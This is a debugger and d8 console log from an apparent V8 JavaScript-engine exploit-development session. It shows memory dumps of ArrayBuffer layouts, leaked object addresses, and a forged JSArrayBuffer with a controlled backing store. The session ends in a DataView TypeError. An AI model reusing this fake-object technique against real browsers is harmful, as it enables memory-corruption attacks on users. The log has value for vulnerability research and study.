gef➤ c
Continuing.
[object ArrayBuffer]
DebugPrint: 0x2790818d: [JSArrayBuffer]
- map = 0x474865c9 [FastProperties]
- prototype = 0x4b28f2d1
- elements = 0x5cc04125 <FixedArray[0]> [FAST_HOLEY_SMI_ELEMENTS]
- internal fields: 2
- backing_store = 0x565f07a0
- byte_length = 12
- properties = {
}
- internal fields = {
0
0
}
0x474865c9: [Map]
- type: JS_ARRAY_BUFFER_TYPE
- instance size: 32
- inobject properties: 0
- elements kind: FAST_HOLEY_SMI_ELEMENTS
- unused property fields: 0
- enum length: invalid
- stable_map
- back pointer: 0x5cc041a1
- instance descriptors (own) #0: 0x5cc0411d <FixedArray[0]>
- prototype: 0x4b28f2d1
- constructor: 0x4b28f299
- code cache: 0x5cc04125 <FixedArray[0]>
- dependent code: 0x5cc04125 <FixedArray[0]>
- construction counter: 0
gef➤ x/32wx 0x2790818c
0x2790818c: 0x474865c9 0x5cc04125 0x5cc04125 0x00000018
0x2790819c: 0x565f07a0 0x00000004 0x00000000 0x00000000
0x279081ac: 0x474864c1 0x5cc04125 0x5cc04125 0x2790818d
0x279081bc: 0x00000000 0x00000018 0x00000000 0x00000000
0x279081cc: 0x48e84839 0x00000003 0x00000026 0x5cc42459
0x279081dc: 0x5cc4e669 0x48e84839 0x00000003 0x00000028
0x279081ec: 0x279081cd 0x5cc06995 0xdeadbeef 0xdeadbeef
0x279081fc: 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef
gef➤ x/32wx 0x474865c8
0x474865c8: 0x48e8412d 0x3d000008 0x000900c3 0x082003ff
0x474865d8: 0x4b28f2d1 0x4b28f299 0x00000000 0x5cc0411d
0x474865e8: 0x5cc04125 0x5cc04125 0x00000000 0x48e8412d
0x474865f8: 0x1a000407 0x031d00bc 0x082013ff 0x4b285171
0x47486608: 0x4b28518d 0x00000000 0x4b28f2ed 0x5cc04125
0x47486618: 0x5cc04125 0x00000000 0x48e8412d 0x1d00000a
0x47486628: 0x007100c4 0x082003ff 0x4b28f48d 0x4b28f455
0x47486638: 0x00000000 0x5cc0411d 0x5cc04125 0x5cc04125
gef➤ x/32wx 0x5cc04124
0x5cc04124: 0x48e84185 0x00000000 0x48e841b1 0x3043247e
0x5cc04134: 0x00000008 0x6c6c756e 0x48e841b1 0xae4b45da
0x5cc04144: 0x0000000c 0x656a626f 0xdead7463 0x48e84235
0x5cc04154: 0x00000000 0xbff00000 0x5cc0416d 0xfffffffe
0x5cc04164: 0x5cc04189 0x0000000c 0x48e841b1 0xe697d962
0x5cc04174: 0x0000001a 0x6e696e75 0x61697469 0x657a696c
0x5cc04184: 0xdeadbe64 0x48e841b1 0x21a3306e 0x00000012
0x5cc04194: 0x65646e75 0x656e6966 0xdeadbe64 0x48e84261
gef➤ x/32wx 0x48e84184
0x48e84184: 0x48e8412d 0x06000000 0x001800a9 0x002003ff
0x48e84194: 0x5cc04101 0x5cc04101 0x00000000 0x5cc0411d
0x48e841a4: 0x5cc04125 0x5cc04125 0x00000000 0x48e8412d
0x48e841b4: 0x00007700 0x00190004 0x082003ff 0x5cc04101
0x48e841c4: 0x5cc04101 0x00000000 0x5cc0411d 0x5cc04125
0x48e841d4: 0x5cc04125 0x00000000 0x48e8412d 0x14000001
0x48e841e4: 0x00190095 0x082003ff 0x5cc04101 0x5cc04101
0x48e841f4: 0x00000000 0x5cc0411d 0x5cc04125 0x5cc04125
root@ubuntu1804:~/hack/hack/docker/ubuntu1804/hack/v8/v8/out.gn/ia32.debug# ./d8 --allow_natives_syntax 1.js
[-] 22.ab2_map_obj_addr: 0x52cd5b21
[-] 3.fake_ab_float_addr: 0x52ce9441
debug
fp = 0xffffcc04, sp = 0xffffcbc8, caller_sp = 0xffffcc0c: #
0x52ce9441: [JSArrayBuffer]
- map = 0x52cc1ee9 [FastProperties]
- prototype = 0x3fb8f2d1
- elements = 0x52cd5b21 <FixedArray[0]> [FAST_HOLEY_SMI_ELEMENTS]
- internal fields: 2
- backing_store = 0x12345678
- byte_length = 8192
- properties = {
}
- internal fields = {
0
0
}
1.js:195: TypeError: First argument to DataView constructor must be an ArrayBuffer
fake_dv = new DataView(fake_arraybuffer,1,0x2000);
^
TypeError: First argument to DataView constructor must be an ArrayBuffer
at new DataView ()
at 1.js:195:12
